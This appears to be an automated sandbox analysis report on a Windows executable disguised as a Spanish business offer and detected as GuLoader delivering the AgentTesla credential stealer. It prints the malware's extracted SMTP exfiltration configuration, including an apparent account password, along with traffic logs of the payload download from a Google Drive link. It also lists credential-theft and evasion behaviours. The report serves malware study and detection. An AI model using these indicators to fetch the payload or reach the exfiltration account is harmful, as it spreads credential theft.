Loading ...

Play interactive tourEdit tour

Windows Analysis Report GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe

Overview

General Information

Sample Name:GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe
Analysis ID:1371
MD5:991bee5a9edd18a183c900b7edeccefe
SHA1:18189c5a9d3ab005df5426494e2016a5d64b8c72
SHA256:e3c94531505c4a4d5bb35bb62e773676f7e9ab522111d930f02c3144c971414d
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe (PID: 6280 cmdline: 'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe' MD5: 991BEE5A9EDD18A183C900B7EDECCEFE)
    • RegAsm.exe (PID: 1408 cmdline: 'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "info@quantgemfxinvest.comDagofe2000mail.quantgemfxinvest.comofficialspace6@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.34336278917.00000000023C0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 1408JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 1408JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.156.219.141, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 1408, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49807

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe.6280.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "info@quantgemfxinvest.comDagofe2000mail.quantgemfxinvest.comofficialspace6@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeVirustotal: Detection: 27%Perma Link
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeReversingLabs: Detection: 11%
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeAvira: detected
            Source: 1.0.GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.wsjms
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49806 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: SOLTIAES SOLTIAES
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8k3vc3ju64ugjuf54q6v6uu1oc/1632760800000/13596271228415839806/*/1ycJKsjL72mds_kr72amoQuYUYdcifxy0?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9c-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49807 -> 185.156.219.141:587
            Source: global trafficTCP traffic: 192.168.11.20:49807 -> 185.156.219.141:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000005.00000002.38793335913.000000001DC8D000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000005.00000002.38793335913.000000001DC8D000.00000004.00000001.sdmpString found in binary or memory: http://WG0ZsvMNHDPKMQFPtKr.net
            Source: RegAsm.exe, 00000005.00000002.38793335913.000000001DC8D000.00000004.00000001.sdmpString found in binary or memory: http://WG0ZsvMNHDPKMQFPtKr.nett-
            Source: RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: RegAsm.exe, 00000005.00000002.38799907527.000000001FD84000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: RegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://eFyLKv.com
            Source: RegAsm.exe, 00000005.00000002.38793925849.000000001DD0D000.00000004.00000001.sdmpString found in binary or memory: http://mail.quantgemfxinvest.com
            Source: RegAsm.exe, 00000005.00000002.38793925849.000000001DD0D000.00000004.00000001.sdmpString found in binary or memory: http://quantgemfxinvest.com
            Source: RegAsm.exe, 00000005.00000002.38799907527.000000001FD84000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
            Source: RegAsm.exe, 00000005.00000002.38799907527.000000001FD84000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: RegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-9c-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.34312263979.0000000000CFB000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-9c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8k
            Source: RegAsm.exe, 00000005.00000002.38781778105.0000000000C78000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/3
            Source: RegAsm.exe, 00000005.00000002.38781778105.0000000000C78000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/s
            Source: RegAsm.exe, 00000005.00000002.38781651449.0000000000C50000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0
            Source: RegAsm.exe, 00000005.00000002.38781778105.0000000000C78000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy08
            Source: RegAsm.exe, 00000005.00000003.34307259221.0000000000CFB000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0kCQupfSKyzZjNr4gg
            Source: RegAsm.exe, 00000005.00000002.38781651449.0000000000C50000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0wininet.dllMozilla/5
            Source: RegAsm.exe, 00000005.00000002.38793049140.000000001DC53000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000005.00000002.38793049140.000000001DC53000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8k3vc3ju64ugjuf54q6v6uu1oc/1632760800000/13596271228415839806/*/1ycJKsjL72mds_kr72amoQuYUYdcifxy0?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9c-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49806 version: TLS 1.2
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A4C060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A49A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A50218
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A56A48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A514E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F08998
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F0A7C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F0CF28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F0E4DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F01D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CAD0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CAD81B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CADCFFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CAD53D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CADF758
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CAD2AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CAD0023
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CADD748
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA05E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA04ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA05DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA06AF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F05858
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34334612602.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKios2.exe vs GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeBinary or memory string: OriginalFilenameKios2.exe vs GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeVirustotal: Detection: 27%
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeReversingLabs: Detection: 11%
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe 'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe'
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeFile created: C:\Users\user\AppData\Local\Temp\~DFD14487B4C4D136C6.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/1@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.34336278917.00000000023C0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_004055C5 push eax; retf
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_00402ACE push ecx; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_004066FC push ebx; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C3214 push esi; iretd
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C3BAF push eax; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C2808 push cs; retf
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C7079 push 0000001Ch; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C50D2 pushfd ; iretd
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C5139 pushfd ; iretd
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C190D push 00000055h; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C1637 push esp; iretd
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C06B6 push esp; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C26FF pushfd ; retf
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeCode function: 1_2_023C6FFD push edi; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1CAD1B50 push eax; ret
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeFile created: \grupo mari#u00d1o obras y servicios, sl oferta 2709213390.exe
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeFile created: \grupo mari#u00d1o obras y servicios, sl oferta 2709213390.exe
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
